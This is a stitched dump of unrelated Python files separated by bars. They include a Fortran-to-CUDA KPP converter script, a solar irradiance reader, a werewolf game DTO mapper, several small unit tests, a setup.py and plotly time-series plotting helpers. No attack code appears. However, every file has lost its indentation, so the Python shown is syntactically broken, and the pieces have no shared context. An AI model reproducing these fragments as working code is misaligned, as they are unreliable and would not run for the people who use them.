deallocate(ierr_u2) \n\
data_loaded = .false. \n\
\n\
return \n\
END SUBROUTINE kpp_integrate\n"
file_out.write(out)
for i in range(stop+1,len(source)):
file_out.write(source[i])
pass
#########################################################################################################
#########################################################################################################
def add_cuda_compilation(file_specific,file_makefile,arch):
file_makefile.seek(0)
out = "\nmessy_mecca_kpp_acc.o: messy_mecca_kpp_acc.cu specific.mk \n\
\tnvcc -v --ptxas-options=-v " + arch +" --ftz=false --prec-div=true --prec-sqrt=true --fmad=false -O3 -g -c $<"
file_specific.write(out)
temp = open('__temp', 'wb')
for line in file_makefile:
if line.startswith('$(LIB): depend $(OBJS)'):
line = line.strip() + ' $(OBJSCUDA)\n'
if line.startswith('\t$(AR) $(ARFLAGS) $(LIB) $(OBJS)'):
line = line.rstrip() + ' $(OBJSCUDA)\n'
if line.startswith('depend $(MAKEFILE_INC): $(SRCS)'):
line = line.rstrip() + ' $(ACC_SRCS)\n'
if line.startswith('OBJS := $(SRCS:.f90=.o)'):
line ='OBJSCUDA := $(SRCS_ACC:.cu=.o)\n' + line
if line.startswith('SRCS := $(filter-out F%.f90, $(SRCS0)'):
line ='SRCS_ACC := $(wildcard *.cu) \n' + line
if line.startswith('.SUFFIXES: $(SUFFIXES) .f90 .md5'):
line ='.SUFFIXES: $(SUFFIXES) .f90 .md5 .cu\n'
temp.write(line.encode())
temp.close()
os.rename('__temp', smcl + "Makefile.m")
pass
#########################################################################################################
#########################################################################################################
# Based on the input files, select the proper flags
def get_transformation_flags():
multifile = False
vectorize = False
indirect = False
inject_rconst = False
# Check if kpp created indirect indexing
if ('LU_CROW(k+1)' in open(smcl + "messy_mecca_kpp.f90").read()) or ('LU_CROW(k+ 1)' in open(smcl + "messy_mecca_kpp.f90").read()):
print("Warning: Can't convert indirect indexing of file.")
print("--> Change the decomp in the conf file or modify the output file.\n")
indirect = True
# Check if kpp created vector length chemistry
if '= C(1:VL,:)' in open(smcl + "messy_mecca_kpp.f90").read():
print("Can't convert vectorized version of file.")
print("--> Change the rosenbrock_vec to reosenbrock_mz in the conf file.\n")
print("Exiting... \n")
vectorized = True
exit(-1)
# Check if kpp created the multiple files version.
if ( os.path.isfile(smcl + "messy_mecca_kpp_global.f90") == True and
os.path.isfile(smcl + "messy_mecca_kpp_jacobian.f90") == True
):
print("Multifile version detected!")
multifile = True
if (multifile == True):
file_messy_mecca_kpp = open(smcl + "messy_mecca_kpp_linearalgebra.f90","r")
subroutines = find_subroutines(file_messy_mecca_kpp, ["KppDecomp","KppDecompCmplx"])
infile = " ".join(subroutines["kppdecomp"])
if 'LU_ICOL(kk)' in infile:
print("Multiple files with indirect indexing detected.\n")
indirect = True
if (multifile == True):
file_messy_mecca_kpp = open(smcl + "messy_mecca_kpp_integrator.f90","r")
lines = file_messy_mecca_kpp.readlines()
infile = " ".join(lines)
if '! CALL Update_RCONST()' not in infile:
inject_rconst = True;
else:
file_messy_mecca_kpp = open(smcl + "messy_mecca_kpp.f90","r")
lines = file_messy_mecca_kpp.readlines()
infile = " ".join(lines)
if '! CALL Update_RCONST()' not in infile:
inject_rconst = True;
return multifile, vectorize, indirect, inject_rconst
pass
#########################################################################################################
#########################################################################################################
def print_warning():
print('\033[1m' + "\n####################################################################################################")
print("## WARNING!! BETA VERSION ! PLEASE REPORT TO PACKAGE MAINTAINERS ANY BUGS OR UNEXPECTED BEHAVIOUR.")
print("####################################################################################################\n")
print('\033[0m')
pass
#########################################################################################################
#########################################################################################################
def select_architecture(ans):
if ans=="1":
arch = "--gpu-architecture=compute_20 -maxrregcount=128 "
elif ans=="2":
arch = "--gpu-architecture=compute_35"
elif ans=="3":
arch = "--gpu-architecture=compute_50"
elif ans=="4":
arch = "--gpu-architecture=compute_60"
elif ans=="5":
arch = "--gpu-architecture=compute_70"
else:
arch = "--gpu-architecture=compute_20"
return arch
def print_menu_make_selection(ros,gpu):
if gpu is None:
print ("""
Select CUDA architecture (1-5):
1. CUDA 2.0 ( FERMI GPU architecture )
2. CUDA 3.5 ( KEPLER GPU architecture )
3. CUDA 5.2 ( MAXWELL GPU architecture )
4. CUDA 6.0 ( PASCAL GPU architecture )
5. CUDA 7.0 ( VOLTA GPU architecture )
""")
gpu = input("Option (Default 1): ")
arch = select_architecture(gpu)
if ros is None:
print ("""
Select Rosenbrock solver (1-6):
1. All ( Selects based on the runtime option )
2. Ros2 ( 2-stage L-stable - FASTEST )
3. Ros3 ( 3-stage L-stable - RECOMMENDED )
4. Ros4 ( 4-stage L-stable )
5. Rodas3 ( 4-stage stiffly accurate )
6. Rodas4 ( 6-stage stiffly accurate - SLOWEST )
""")
ros = input("Option (Default 1): ")
if ros not in ['1','2','3','4','5','6']:
ros = "0"
print("Selected options: " + arch + " with ros: " + ros + "\n")
return ros,arch
#########################################################################################################
#########################################################################################################
##
## Main program
##
#########################################################################################################
#########################################################################################################
# Set variables for checking
multifile = False
vectorize = False
indirect = False
inject_rconst = False
###############################################
# check if we have the arguments
parser = argparse.ArgumentParser(description='MEDINA: FORTRAN to CUDA KPP for EMAC Preprocessor.')
parser.add_argument('-r', '--ros', help='An integer value of the Rosenbrock solver produced [1: all (selected at runtime), 2: Ros2, 3: Ros3, 4: Rodas3, 5: Rodas4]')
parser.add_argument('-g', '--gpu', help='An integer value of the architecture [1: FERMI, 2: KEPLER, 3: MAXWELL, 4: PASCAL]')
parser.add_argument('-s', '--smcl', help='smcl folder location, default: "../../smcl/"')
args = parser.parse_args()
if args.smcl:
smcl = args.smcl
ros = args.ros
gpu = args.gpu
# get the options for the architecture and the rosenbrock kernel
ros,arch = print_menu_make_selection(ros,gpu)
###############################################
# Print generic information - header
print("\n+===================================================================+ ")
print("| KPP Fortran to CUDA praser - Copyright 2016 The Cyprus Institute |")
print("+===================================================================+ \n")
print_warning()
# First check if the files exist
# In the future, we will check also the path of the binary
if ( os.path.isfile(smcl + "messy_mecca_kpp.f90") == False or
os.path.isfile(smcl + "messy_cmn_photol_mem.f90") == False or
os.path.isfile(smcl + "messy_main_constants_mem.f90") == False or
os.path.isfile("./source/kpp_integrate_cuda_prototype.cu") == False or
os.path.isfile(smcl + "specific.mk") == False or
os.path.isfile(smcl + "Makefile.m") == False
):
print("Can't find one or more files. \n")
print("--> Run the script at ./messy/util directory of messy. \n")
print("Exiting... \n")
exit(-1)
multifile, vectorize, indirect, inject_rconst = get_transformation_flags()
###############################################
### Backup files
print("==> Step 0: Backup files.\n")
shutil.copyfile(smcl + "specific.mk", smcl + "specific.mk.old")
shutil.copyfile(smcl + "Makefile.m", smcl + "Makefile.m.old")
shutil.copyfile(smcl + "messy_mecca_kpp.f90", smcl + "messy_mecca_kpp.f90.old")
os.remove(smcl + "messy_mecca_kpp.f90")
# Open the files
file_messy_mecca_kpp = open(smcl + "messy_mecca_kpp.f90.old","r")
file_messy_cmn_photol_mem = open(smcl + "messy_cmn_photol_mem.f90","r")
file_messy_main_constants_mem = open(smcl + "messy_main_constants_mem.f90","r")
file_prototype = open("./source/kpp_integrate_cuda_prototype.cu","r")
file_specific = open(smcl + "specific.mk","a")
file_makefile = open(smcl + "Makefile.m","r+")
###############################################
print("==> Step 1: Detect subroutines in the file.")
subroutine_names = ["ros_PrepareMatrix","kppSolve","kppDecomp","Jac_sp","Fun","update_rconst","Initialize"]
subroutines = {}
source_cuda = {}
# if multiple files then we have to extract the functions from multiple files
if (multifile == True):
file_messy = open("messy_mecca_kpp_linearalgebra.f90","r")
subroutines1 = find_subroutines(file_messy, ["KppSolve","kppDecomp"])
file_messy = open("messy_mecca_kpp_integrator.f90","r")
subroutines2 = find_subroutines(file_messy, ["ros_PrepareMatrix"])
file_messy = open("messy_mecca_kpp_jacobian.f90","r")
subroutines3 = find_subroutines(file_messy, ["Jac_SP"])
file_messy = open("messy_mecca_kpp_function.f90","r")
subroutines4 = find_subroutines(file_messy, ["Fun"])
file_messy = open("messy_mecca_kpp_rates.f90","r")
subroutines5 = find_subroutines(file_messy, ["Update_RCONST"])
file_messy = open("messy_mecca_kpp_initialize.f90","r")
subroutines6 = find_subroutines(file_messy, ["Initialize"])
subroutines = dict( list(subroutines1.items()) + list(subroutines2.items()) + list(subroutines3.items()) + list(subroutines4.items()) + list(subroutines5.items()) + list(subroutines6.items()) )
else:
subroutines = find_subroutines(file_messy_mecca_kpp, subroutine_names)
###############################################
print("\n==> Step 2: Replacing variables.")
source_cuda["defines_vars_1"] = generate_define_vars(file_messy_main_constants_mem,["R_gas","atm2Pa","N_A"])
source_cuda["defines_ind_1"] = generate_define_indices_one_line(file_messy_cmn_photol_mem,"ip")
if (multifile == True):
file_messy_mecca_kpp_global = open("messy_mecca_kpp_global.f90","r")
file_messy_mecca_kpp_parameters = open("messy_mecca_kpp_parameters.f90","r")
source_cuda["defines_vars_2"] = generate_define_vars(file_messy_mecca_kpp_parameters,["NSPEC","NVAR","NFIX","NREACT","LU_NONZERO","NBSIZE"])
source_cuda["defines_vars_2"].append(generate_define_NBSIZE(subroutines["jac_sp"]))
source_cuda["defines_ind_2"] = generate_define_indices_many_lines(file_messy_mecca_kpp_parameters,"ind")
source_cuda["defines_ind_3"] = generate_define_indices_one_line(file_messy_mecca_kpp_global,"ihs")
source_cuda["defines_ind_4"] = generate_define_indices_one_line(file_messy_mecca_kpp_global,"iht")
source_cuda["defines_ind_5"] = generate_definitions_global(file_messy_mecca_kpp_global ,["k_","f_","a_"])
else:
source_cuda["defines_vars_2"] = generate_define_vars(file_messy_mecca_kpp,["NSPEC","NVAR","NFIX","NREACT","LU_NONZERO","NBSIZE"])
source_cuda["defines_vars_2"].append(generate_define_NBSIZE(subroutines["jac_sp"]))
source_cuda["defines_ind_2"] = generate_define_indices_many_lines(file_messy_mecca_kpp,"ind")
source_cuda["defines_ind_3"] = generate_define_indices_one_line(file_messy_mecca_kpp,"ihs")
source_cuda["defines_ind_4"] = generate_define_indices_one_line(file_messy_mecca_kpp,"iht")
source_cuda["defines_ind_5"] = generate_definitions_global(file_messy_mecca_kpp,["k_","f_","a_"])
# read the values
NSPEC = int(source_cuda["defines_vars_2"][0].split(" ")[2].strip())
NVAR = int(source_cuda["defines_vars_2"][1].split(" ")[2].strip())
NFIX = int(source_cuda["defines_vars_2"][2].split(" ")[2].strip())
NREACT = int(source_cuda["defines_vars_2"][3].split(" ")[2].strip())
LU_NONZERO = int(source_cuda["defines_vars_2"][4].split(" ")[2].strip())
NBSIZE = int(source_cuda["defines_vars_2"][5].split(" ")[2].strip())
# read the tables
if (multifile == True):
file_messy_jacobian = open("messy_mecca_kpp_jacobiansp.f90","r")
lu_diag = find_LU_DIAG(file_messy_jacobian, NVAR)
lu_crow = find_LU_CROW(file_messy_jacobian, NVAR)
lu_icol = find_LU_ICOL(file_messy_jacobian, NVAR)
else:
lu_diag = find_LU_DIAG(file_messy_mecca_kpp, NVAR)
lu_crow = find_LU_CROW(file_messy_mecca_kpp, NVAR)
lu_icol = find_LU_ICOL(file_messy_mecca_kpp, NVAR)
###############################################
print("\n==> Step 3: Parsing function update_rconst.")
source = subroutines['update_rconst']
source = remove_comments(source)
source = strip_and_unroll_lines(source)
source = fix_power_op(source)
source = decapitalize_vars(source,["rconst","jx","khet_st","khet_tr","cair","press","temp","exp","log","max","min"])
# These are fixes with multifile: jx and khet are 2d
if (multifile == True):
for i in range(len(source)):
source[i] = source[i].replace("USE messy_main_constants_mem","")
source[i] = source[i].replace("USE messy_cmn_photol_mem","k = is")
source[i] = source[i].replace("jx(","jx(k,")
source[i] = source[i].replace("khet_st(","khet_st(k,")
source[i] = source[i].replace("khet_tr(","khet_tr(k,")
source = rconst_preprocessor_1(source)
rconst_ops,rconst_decls = split_rconst(source)
flocals = get_rconst_locals(rconst_decls)
source = subroutines['initialize']
source = remove_comments(source)
source = decapitalize_vars(source,["rconst"])
rinit = create_rconst_init(source)
source_cuda["update_rconst"] = generate_update_rconst(rconst_ops,rconst_decls,flocals,rinit)
###############################################
print("\n==> Step 4: Parsing function kppsolve.")
source = subroutines['kppsolve']
source = remove_comments(source)
source = strip_and_unroll_lines(source)
source = fix_power_op(source)
source = split_beta(source,"X(")
source = fix_indices(source,[("X","K","istage"),("JVS","Ghimj")])
source = strip_lines(source)
source_cuda["kppsolve"] = generate_kppsolve(source)
###############################################
print("\n==> Step 5: Parsing function kppdecomp.")
source = subroutines['kppdecomp']
source = remove_comments(source)
source = strip_and_unroll_lines(source)
source = fix_power_op(source)
if ( indirect == True):
source = split_beta(source,"DO k=1,NVAR")
print("Indirect transformation.")
source_cuda["kppdecomp"] = generate_kppDecompIndirect(source,NSPEC,lu_diag,lu_crow,lu_icol)
else:
source = split_beta(source,"W(")
source = fix_indices(source,[("W","W"),("JVS","Ghimj")])
source_cuda["kppdecomp"] = generate_kppDecomp(source,NSPEC,lu_diag,lu_crow,lu_icol)
###############################################
print("\n==> Step 6: Parsing function jac_sp.")
source = subroutines["jac_sp"]
source = remove_comments(source)
source = strip_and_unroll_lines(source)
source = fix_power_op(source)
source = split_beta(source, "B(")
source = fix_indices(source,[("B","B"),("RCT","rconst"),("F","fix"),("V","var"),("JVS","jcb")])
source_cuda["jac_sp"] = generate_jac_sp(source, NBSIZE)
###############################################
print("\n==> Step 7: Parsing function fun.")
source = subroutines["fun"]
source = remove_comments(source)
source = strip_and_unroll_lines(source)
source = fix_power_op(source)
source = split_beta(source, "A(")
source = fix_indices(source,[("A","A"),("RCT","rconst"),("F","fix"),("V","var"),("Vdot","varDot")])
source_cuda["fun"] = generate_fun(source,NREACT)
###############################################
print("\n==> Step 8: Parsing and preparing diagonal.")
source_cuda["ros_preparematrix"] = generate_prepareMatrix(lu_diag)
###############################################
print("\n==> Step 9: Generating customized solver.")
source_cuda["special_ros"] = generate_special_ros(ros,inject_rconst)
###############################################
print("\n==> Step 10: Generating calls to customized solver.")
source_cuda["call_kernel"] = generate_special_ros_caller(ros)
###############################################
print("\n==> Step 11: Generating kpp_integrate_cuda.")
gen_kpp_integrate_cuda(file_prototype, source_cuda, inject_rconst)
###############################################
print("\n==> Step 12: Generating messy_mecca_kpp replacement.")
generate_c2f_interface(file_messy_mecca_kpp)
###############################################
print("\n==> Step 13: Modifying specific.mk and Makefile")
add_cuda_compilation(file_specific,file_makefile,arch)
###############################################
print("\n##################################################################\n")
print("Don't forget to add the '-lcudart' in the linking options during configuration")
print("For example, it can be added to the SPEC_NETCDF_LIB variable:")
print("SPEC_NETCDF_LIB = -L$EBROOTNETCDFMINFORTRAN/lib -lnetcdff -lcudart -lstdc++")
print_warning()
|
#!/usr/bin/env python
#
# Copyright (c) 2013 Paolo Antonelli, Tiziana Cherubini, Graziano Giuliani
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
class asolar:
"""Solar irradiance dataset"""
def __init__(self,datafile):
from netCDF4 import Dataset
import numpy as np
df = Dataset(datafile)
self.frq = np.array(df.variables['FREQ'][:],np.double)
self.irr = np.array(df.variables['IRRADIANCE'][:],np.double)
df.close()
def get(self,f):
import numpy as np
i = np.interp(f,self.frq,self.irr)
return i
#
# Unit test of the above class
#
if ( __name__ == '__main__' ):
import numpy as np
a = asolar('../data/solar_irradiances.nc')
for j in range(1,1000):
f = np.linspace(1550+j, 2550+j+1, 1550)
i = a.get(f)
print(j)
print(f[0],f[1549])
print(i[0],i[1549])
|
from Shared.dtos.GameDto import GameDto;
from Shared.dtos.GameListDto import GameListDto;
from Shared.enums.PlayerTypeEnum import PlayerTypeEnum;
from Werewolf.game.Game import Game;
def GameToDto(game, lastUpdatedUtc, player):
if not game:
return None;
# don't give any messages if there is no last updated date specified
messages = list();
if lastUpdatedUtc:
messages = [m for m in game.Messages\
if m.TimeUtc >= lastUpdatedUtc\
and (not m.ForPlayer or player.Identifier == m.ForPlayer)\
and (not m.ForRole or not player.Role or player.Role.Type == m.ForRole)];
return GameDto(game.Identifier,\
game.HasStarted,\
game.Name,\
messages,\
game.Votes,\
game.Players,\
game.Turn,\
game.TimeOfDay);
def GameToListDto(game):
if not game:
return None;
return GameListDto(game.Identifier,\
game.Name,\
len(game.Players));
|
def _matcher(pattern, str):
for word in pattern.split(" "):
if word not in str:
return False
return True
def name(secret, names):
for n in names:
if _matcher(n, secret["name"]):
return True
return False
def description(secret, descriptions):
for d in descriptions:
if _matcher(d, secret["description"]):
return True
return False
def tag_key(secret, tag_keys):
for k in tag_keys:
for tag in secret["tags"]:
if _matcher(k, tag["Key"]):
return True
return False
def tag_value(secret, tag_values):
for v in tag_values:
for tag in secret["tags"]:
if _matcher(v, tag["Value"]):
return True
return False
def all(secret, values):
return (
name(secret, values)
or description(secret, values)
or tag_key(secret, values)
or tag_value(secret, values)
)
|
#!/usr/bin/env python
import bootstrap
import unittest
import time
import nark
class Tests(unittest.TestCase):
def setup(self):
return nark.Assert(), nark.Assets(), nark.Factory()
def test_can_create_instance(self):
t, _, i = self.setup()
t.not_null(i, "Failed to create Factory instance")
def test_can_load_file(self):
t, a, i = self.setup()
path = a.resolve("data", "sample1.py")
fp = open(path, "w")
fp.write("text = \"Hello World\"")
fp.close()
i.load(path)
value = i.prop("text")
t.equals(value, "Hello World", "Failed to read module value")
def test_does_not_update_file_if_not_watching(self):
t, a, i = self.setup()
path = a.resolve("data", "sample1.py")
fp = open(path, "w")
fp.write("text = \"Hello World\"")
fp.close()
time.sleep(0.5)
i.load(path)
value = i.prop("text")
t.equals(value, "Hello World", "Failed to read module value")
time.sleep(0.5)
fp = open(path, "w")
fp.write("text = \"Hello WORLD\"")
fp.close()
value = i.prop("text")
t.equals(value, "Hello World", "Failed to read module value")
def test_can_update_file(self):
t, a, i = self.setup()
path = a.resolve("data", "sample1.py")
fp = open(path, "w")
fp.write("text = \"Hello World\"")
fp.close()
i.load(path)
i.watch(True) # Notice watching now
value = i.prop("text")
t.equals(value, "Hello World", "Failed to read module value")
time.sleep(1.0)
fp = open(path, "w")
fp.write("text = \"Hello WORLD\"")
fp.close()
time.sleep(1.0)
value = i.prop("text")
t.equals(value, "Hello WORLD", "Failed to read module value")
if __name__ == "__main__":
unittest.main()
|
"""Test permissions of the site to ensure we haven't given write access."""
import pytest
import urllib.request
import urllib.error
@pytest.mark.parametrize("method", ["PUT", "POST"])
def test_write_is_not_allowed(url, method):
"""Test that WRITE methods are not allowed."""
req = urllib.request.Request(url, data=b"", method=method)
with pytest.raises(expected_exception=urllib.error.HTTPError) as excinfo:
response = urllib.request.urlopen(req)
assert excinfo.value.code == 403
|
from nosem import project, executable, test
project('basic', 'cpp')
demo = executable('basic-demo', 'main.cpp')
test(demo.name(), demo)
|
from click.testing import CliRunner
from src.cli import cli
def test_cli():
"""Test CLI to import all commands without any error and exception
"""
runner = CliRunner()
result = runner.invoke(cli)
assert result.exit_code == 0
assert not result.exception
|
# This is purely the result of trial and error.
import os
import sys
import codecs
import subprocess
from setuptools import setup
from setuptools import find_packages
import aiowrpr
INSTALL_REQUIRES = [
'aiodns==2.0.0',
'aiohttp[speedups]>=3.7.4',
'aiohttp-apispec==2.1.0',
'apispec==3.2.0',
'async-timeout==3.0.1',
'attrs==19.3.0',
'brotlipy==0.7.0',
'cchardet==2.1.5',
'cffi==1.13.2',
'chardet==3.0.4',
'idna==2.8',
'marshmallow==3.3.0',
'multidict==4.7.1',
'pycares==3.1.0',
'pycparser==2.19',
'ujson==1.35',
'webargs>=5.5.3',
'yarl==1.4.2'
]
# Conditional dependencies:
if sys.version_info < (3, 5) or sys.version_info > (3, 8):
sys.exit(
f"Sorry, Python {'.'.join(map(str, sys.version_info[:3]))} is not supported"
)
def long_description():
with codecs.open('README.md', encoding='utf8') as f_:
return f_.read()
# Fetch version from git tags, and write to version.py.
# Also, when git is not available (PyPi package), use stored version.py.
VERSION_PY = os.path.join(os.path.dirname(__file__), 'version.py')
try:
VERSION_GIT = str(subprocess.check_output(["git", "describe", "--tags"]).rstrip(), 'utf-8')
except Exception as _:
with open(VERSION_PY, 'r') as fh:
VERSION_GIT = open(VERSION_PY).read().strip().split('=')[-1].replace('"', '')
VERSION_MSG = "# Do not edit this file, pipeline versioning is governed by git tags"
with open(VERSION_PY, 'w') as fh:
fh.write(f'{VERSION_MSG}{os.linesep}__version__={VERSION_GIT}')
setup(
name='aiowrpr',
version=VERSION_GIT,
description=aiowrpr.__doc__.strip(),
long_description=long_description(),
url='https://github.com/ishirshov/aiowrpr',
download_url='https://github.com/ishirshov/aiowrpr',
author=aiowrpr.__author__,
author_email='ildar.shirshov@gmail.com',
license=aiowrpr.__license__,
packages=find_packages(),
scripts=['bin/make_api'],
entry_points={
'console_scripts': [
'http = httpie.__main__:main',
'https = httpie.__main__:main',
],
},
install_requires=INSTALL_REQUIRES,
classifiers=[
'Development Status :: 1 - Planning',
'Programming Language :: Python',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Environment :: Console',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: BSD License',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Software Development',
'Topic :: System :: Networking',
'Topic :: Terminals',
'Topic :: Text Processing',
'Topic :: Utilities'
],
)
|
"""
Python Script used for plotting common timeseries charts
"""
# Data Manipulation
import pandas as pd
import numpy as np
from scipy.ndimage.interpolation import shift
# Data Visualization
from plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot
import plotly.express as px
from plotly.subplots import make_subplots
import plotly.graph_objects as go
init_notebook_mode(connected=True)
from ipywidgets import widgets, interact, interact_manual
from IPython.display import display, clear_output
from itertools import product
import functools
# Timeseries Manipulation
import statsmodels.api as sm
from statsmodels.tsa.stattools import acf
from statsmodels.graphics.tsaplots import plot_acf
# Other
import sys
import warnings
sys.path.append("../src")
import ts_preprocess, ts_models
def plot_rolling(ts, window):
"""
Function that plots the rolling window value for the tiemseries
Args:
ts(pd.Series): The timeseries to be tested
Returns:
fig(plotly.fig): The figure value
"""
#Determing rolling statistics
x = ts.index
rolmean = pd.Series(ts).rolling(window=window).mean().values
rolstd = pd.Series(ts).rolling(window=window).std().values
fig = go.Figure()
fig.add_trace(
go.Scatter(x=x, y=ts.values ,name = 'original_values'))
fig.add_trace(
go.Scatter(x=x, y=rolmean ,name = 'rolling_mean'))
fig.add_trace(
go.Scatter(x=x, y=rolstd ,name = 'rolling_std'))
fig.update_layout(title_text="Stationary Rolling Window")
return fig
def plot_timerseries_decomposition(df, **kwargs):
"""
Function that plots the decomposition of the timeseries
The plot includes the following:
* Trend values
* Seasonal values
* Observed values
* Residual values
Args:
df(pd.DataFrame): The timeseries dataframe indexed with date
Returns:
fig: Plotly Figure
"""
ts_preprocess.validate_datetime_index(df, allow = False)
height = kwargs.get('height',800)
width = kwargs.get('width',1000)
title_text = kwargs.get('title_text', "Timeseries Components")
path_html = kwargs.get('path_html', None)
decomposition = ts_models.calculate_decompose(df, model='multiplicative')
fig = make_subplots(rows=4, cols=1)
x = decomposition.observed.index
fig.add_trace(
go.Scatter(x=x, y=decomposition.observed.values,name = 'Observed'),
row=1, col=1)
fig.add_trace(
go.Scatter(x=x, y=decomposition.trend.values,name = 'Trend'),
row=2, col=1)
fig.add_trace(
go.Scatter(x=x, y=decomposition.seasonal.values,name = 'Seasonal'),
row=3, col=1)
fig.add_trace(
go.Scatter(x=x, y=decomposition.resid.values,name = 'Residual'),
row=4, col=1)
fig.update_layout(height=height, width=width,
title_text=title_text)
if path_html is not None:
fig.write_html(path_html)
return fig.show()
def plot_autocorrelation(df, **kwargs):
"""
Function that plots the autocorrelation of a timeseries
Args:
df(pd.DataFrame): The timeseries dataframe indexed with date
Returns:
fig: Plotly Figure
"""
ts_preprocess.validate_datetime_index(df, allow = False)
nlags = kwargs.get('nlags',40)
alpha = kwargs.get('alpha',0.05)
qstat = kwargs.get('qstat',True)
fft = kwargs.get('fft',False)
height = kwargs.get('height',600)
width = kwargs.get('width',1000)
title_text = kwargs.get('title_text', "Timeseries Components")
path_html = kwargs.get('path_html', None)
# Get values for autocorrelation
cf,confint,qstat,pvalues = acf(df,nlags=nlags,alpha=alpha,qstat = qstat,fft=fft)
# Get Autocorrelation intervals for plotting
x = list(range(1,nlags+1))
y = cf
y_upper = 1-confint[:,1]
y_lower = (1-confint[:,1])*-1
# Draw vertical lines
shapes = list()
for i in zip(range(1,nlags+1),y):
shapes.append({'type': 'line',
'xref': 'x',
'yref': 'y',
'x0': i[0],
'y0': 0,
'x1': i[0],
'y1': i[1]})
layout = go.Layout(shapes=shapes)
fig = go.Figure([
go.Scatter(
x=x,
y=y,
fill=None,
fillcolor='rgba(0,0,255,0)',
line=dict(color='rgb(0,0,0)'),
mode='lines+markers',
name='Autocorrelation'
),
go.Scatter(
x=x,
y=y_upper,
fill='tozeroy',
fillcolor='rgba(0,0,255,.05)',
line=dict(color='rgba(255,255,255,0)'),
showlegend=False
),
go.Scatter(
x=x,
y=y_lower,
fill='tonextx',
fillcolor='rgba(0,0,255,.2)',
line=dict(color='rgba(255,255,255,0)'),
showlegend=False
)
])
fig.update_layout(layout)
fig.update_layout(title=title_text, xaxis_title = 'Lag', yaxis_title='ACF')
fig.update_layout(height=height, width=width)
if path_html is not None:
fig.write_html(path_html)
return fig.show()
def plot_timeseries_columns(df):
"""
Function that plots an interactive Timeseries plot
based on the available columns of the dataset
Args:
df(pd.DataFrame): The timeseries dataframe indexed with date
Returns:
fig: Plotly Figure
"""
v = ts_preprocess.validate_datetime_index(df, allow = True)
try:
column_list = list(df.columns)
except:
column_list =[df.name]
if isinstance(df,pd.Series):
is_series = True
xops = ["Series Index"]
xplaceholder = "NA"
elif v:
is_series = True
xops = ["Series Index"]
xplaceholder = df.index.name
else:
is_series = False
xops = column_list
xplaceholder = column_list[0]
def _plot(df,y,x,title, color):
"""
Support function that is called when the button is clicked
"""
if is_series is False:
fig = px.line(data_frame = df,
x=x,
y=y,
title=title, color = color)
else:
fig = px.line(data_frame = df,
y=y,
title=title)
return fig.show()
# Create Widgets
title = widgets.Text(value = " Chart Title",
placeholder = "Insert Title Here",
description = "Chart title",
disabled = False)
timeseries = widgets.Dropdown(options = column_list,
placeholder = column_list[0],
description = "(Y-Axis) Plot Column",
disabled = False)
xaxis = widgets.Dropdown(options = xops,
placeholder = xplaceholder,
description = "(X-Axis) Plot Column",
disabled = False)
color_selector = widgets.Dropdown(options = [None] + column_list,
placeholder = None,
description = "Select Color Column",
disabled = False)
heading = widgets.HBox([title])
second_row = widgets.HBox([xaxis,timeseries])
third_row = widgets.HBox([color_selector])
button = widgets.Button(description = "Generate Chart")
display(heading)
display(second_row)
display(third_row)
display(button)
def on_button_clicked(button):
"""
Function used for button click
"""
clear_output()
display(heading)
display(second_row)
display(third_row)
display(button)
_plot(df,y=timeseries.value,x=xaxis.value,
title=title.value, color=color_selector.value)
button.on_click(functools.partial(on_button_clicked))
def plot_exponential_smoothing_results(train,fcast,test=None,**kwargs):
"""
Function that plots the results of the function call exponential_smoothing
"""
height = kwargs.get('height',600)
width = kwargs.get('width',1000)
title_text = kwargs.get('title_text', "Model Results Exponential Smoothing")
path_html = kwargs.get('path_html', None)
x = train.index
fig = go.Figure()
fig.add_trace(
go.Scatter(x=x, y=train.values,name = 'Train'))
if test is not None:
fig.add_trace(
go.Scatter(x=test.index, y=test.values,name = 'Test'))
fig.add_trace(
go.Scatter(x=fcast.index, y=fcast.values,name = 'Forecast'))
fig.update_layout(height=height, width=width,
title_text=title_text)
if path_html is not None:
fig.write_html(path_html)
return fig.show()
def plot_errors(train,fcast,model,**kwargs):
"""
Support function to plot Residuals, One Step Errors
"""
height = kwargs.get('height',600)
width = kwargs.get('width',1000)
title_text = kwargs.get('title_text', "Residuals & One-Step Error")
path_html = kwargs.get('path_html', None)
errors = train.values-shift(fcast.values, 1,cval=train.values[0])
errors_perc = model.resid/train.values
fig = make_subplots(rows=3, cols=1)
fig.add_trace(
go.Scatter(x=fcast.index, y=model.resid,name = 'Residuals'), row=1,col=1)
fig.add_trace(
go.Scatter(x=fcast.index, y=errors,name = 'One Step Error'), row=2,col=1)
fig.add_trace(
go.Scatter(x=fcast.index, y=errors_perc,name = 'Resid %'), row=3,col=1)
fig.update_layout(height=height, width=width,
title_text=title_text)
if path_html is not None:
fig.write_html(path_html)
return fig.show()
def plot_scatter_matrix(df, trim_label = None, **kwargs):
"""
Function that plots the interactive scatter matrix
"""
height = kwargs.get('height',600)
width = kwargs.get('width',1000)
path_html = kwargs.get('path_html', None)
ops = tuple(df.columns)
if trim_label is None:
val = -1
else:
val = trim_label
def _plot(df,cols):
"""
Support function that is called when the button is clicked
"""
dimensions = []
for i in cols:
d = dict(label = i[4:val], values = df[i])
dimensions.append(d)
fig = go.Figure(data=go.Splom(dimensions=dimensions,
marker=dict(showscale=False,
line_color='white', line_width=0.5)))
fig.update_layout(height=height, width=width,font=dict(size=8))
if path_html is not None:
